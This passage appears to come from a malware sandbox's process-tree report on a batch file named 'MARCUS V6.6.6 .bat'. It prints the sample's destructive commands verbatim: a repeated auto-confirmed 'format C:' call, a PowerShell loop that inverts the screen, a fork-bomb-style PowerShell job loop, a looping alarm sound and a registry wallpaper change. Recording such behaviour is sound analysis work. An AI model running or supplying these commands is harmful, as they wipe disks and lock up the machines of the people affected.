                                                                                                            • C:\Windows\system32\mode.com
                                                                                                              mode 85,30
                                                                                                              2⤵
                                                                                                                PID:4272
                                                                                                              • C:\Windows\system32\wscript.exe
                                                                                                                wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                                2⤵
                                                                                                                  PID:668
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                                  2⤵
                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4276
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                                  2⤵
                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                  PID:4676
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4680
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline"
                                                                                                                    3⤵
                                                                                                                      PID:1960
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                                  1⤵
                                                                                                                    PID:1356
                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                      chcp 1250
                                                                                                                      2⤵
                                                                                                                        PID:3948
                                                                                                                      • C:\Windows\system32\mode.com
                                                                                                                        mode 85,30
                                                                                                                        2⤵
                                                                                                                          PID:952
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                          2⤵
                                                                                                                            PID:1516
                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                            2⤵
                                                                                                                              PID:712
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                              2⤵
                                                                                                                                PID:4004
                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                2⤵
                                                                                                                                  PID:3428
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                  2⤵
                                                                                                                                    PID:5532
                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                    2⤵
                                                                                                                                      PID:3700
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                      2⤵
                                                                                                                                        PID:4196
                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                        2⤵
                                                                                                                                          PID:4960
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                          2⤵
                                                                                                                                            PID:188
                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                            2⤵
                                                                                                                                              PID:2428
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                              2⤵
                                                                                                                                                PID:4412
                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                2⤵
                                                                                                                                                  PID:5564
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5828
                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2864
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4984
                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5952
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2300
                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1848
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3556
                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:720
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
  2⤵
    PID:2128
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:3672
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:1164
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:4988
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:5796
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:2776
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:764
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:3496
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:3696
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:4756
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:1312
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:4496
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:4192
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:2244
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:420
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:4272
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:956
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:2492
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:3540
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:564
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:1300
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:2324
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:3452
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:1740
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:5040
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:5844
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:544
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:5308
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:2940
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:6052
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:4832
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:3952
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:5736
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:2696
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:3764
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:4432
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:4676
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:1600
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:5908
  • C:\Windows\system32\format.com
    format C: /fs:NULL /p:3 /q
    2⤵
      PID:6084
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2⤵
      PID:2620
  • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:3724
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2140
                                                                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:668
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:4448
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5868
                                                                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1972
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5700
                                                                                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:5004
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:3972
                                                                                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:3948
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:3628
                                                                                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:1188
                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:2916
                                                                                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:4860
                                                                                                                                                                                                                                                                                • C:\Windows\system32\wscript.exe
                                                                                                                                                                                                                                                                                  wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:2364
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:712
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\wscript.exe
                                                                                                                                                                                                                                                                                    wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:4772
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:784
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                      PID:5996
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:908
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:4628
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:440
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:5844
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:3764
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:5444
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:3972
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:1704
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:4324
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:188
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:5812
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:5112
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:4228
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:5860
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:2344
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:6256
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  3⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:6408
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6552
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6684
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6820
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6956
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7084
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6248
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6564
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6940
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6536
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6528
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7280
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7416
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7544
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7672
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:7804
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
